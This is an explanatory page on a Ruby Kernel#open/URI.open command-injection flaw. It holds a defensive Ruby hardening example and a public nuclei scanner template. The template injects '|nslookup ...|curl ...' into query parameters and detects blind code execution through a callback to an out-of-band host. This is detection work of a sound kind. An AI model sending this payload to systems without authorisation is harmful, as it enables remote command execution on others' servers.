Ruby's Kernel#open and URI.open enable not only file access but also process invocation: when the argument begins with a pipe symbol (e.g., open("| ls")), the rest of the string is executed as a command. Passing variable, attacker-controlled input as the argument of Kernel#open or URI.open can therefore lead to Remote Code Execution.
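As an added illustration (not part of this page or the nuclei template), the Ruby snippet below places the vulnerable Kernel#open pattern next to a hardened reader built on File.open, which opens a file by name and never interprets a leading pipe as a command. The helper names, the base-directory confinement and the sample file are assumptions made for the example; the vulnerable helper is shown for contrast and is never called.

```ruby
require "tmpdir"

# Matches a leading pipe, optionally preceded by whitespace (stricter than
# Kernel#open itself, which only looks at the first character).
PIPE_PREFIX = /\A\s*\|/

# True when passing this string to Kernel#open / URI.open would spawn a process.
def pipe_prefixed?(input)
  input.to_s.match?(PIPE_PREFIX)
end

# Vulnerable pattern (hypothetical helper, never called below): Kernel#open
# treats "|cmd" as a command, so untrusted input reaches a shell.
def read_with_kernel_open(path)
  open(path, &:read)
end

# Hardened pattern (hypothetical helper): reject pipe-prefixed input, confine
# the resolved path to base_dir, and use File.open, which always opens a file
# and never spawns a process regardless of the name.
def safe_read(base_dir, relative)
  raise ArgumentError, "pipe prefix rejected" if pipe_prefixed?(relative)
  base = File.expand_path(base_dir)
  full = File.expand_path(relative, base)
  raise ArgumentError, "path escapes base dir" unless full.start_with?(File.join(base, ""))
  File.open(full, "r", &:read)
end

# Exercises the hardened helper on constructed input inside a throwaway
# directory and returns the observed outcomes.
def demo
  Dir.mktmpdir do |dir|
    File.write(File.join(dir, "notes.txt"), "hello\n") # constructed sample file
    {
      ok:        safe_read(dir, "notes.txt"),
      pipe:      (safe_read(dir, "| id") rescue $!.message),
      traversal: (safe_read(dir, "../../etc/passwd") rescue $!.message),
      # File.open with the same pipe-prefixed name fails to find a file
      # instead of running a command.
      file_open: (File.open("| id", &:read) rescue $!.class)
    }
  end
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

Running the file prints the four outcomes: the legitimate file is read, the pipe-prefixed and traversal inputs are rejected before any I/O, and File.open on "| id" raises Errno::ENOENT rather than executing id.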
PoC code [public]
id: cmdi-ruby-open-rce

info:
  name: Ruby Kernel#open/URI.open RCE
  author: pdteam
  severity: high
  description: |
    Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open("| ls")). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open.
  reference:
    - https://bishopfox.com/blog/ruby-vulnerabilities-exploits
    - https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/
  metadata:
    max-request: 1
  tags: cmdi,oast,dast,blind,ruby,rce,vuln

variables:
  marker: "{{interactsh-url}}"

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    stop-at-first-match: true
    payloads:
      interaction:
        - "|nslookup {{marker}}|curl {{marker}}"

    fuzzing:
      - part: query
        fuzz:
          - "{{interaction}}"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100d92df5db8aad5337f3bfd5b6b74ac56650ed4b46a01670f2cc17edfc482eebf70221008653513ecb252e26cbc2c9a2b34a6a150f3017f6eaff6568a00626ac7a8c64f4:922c64590222798bb761d5b6d8e72950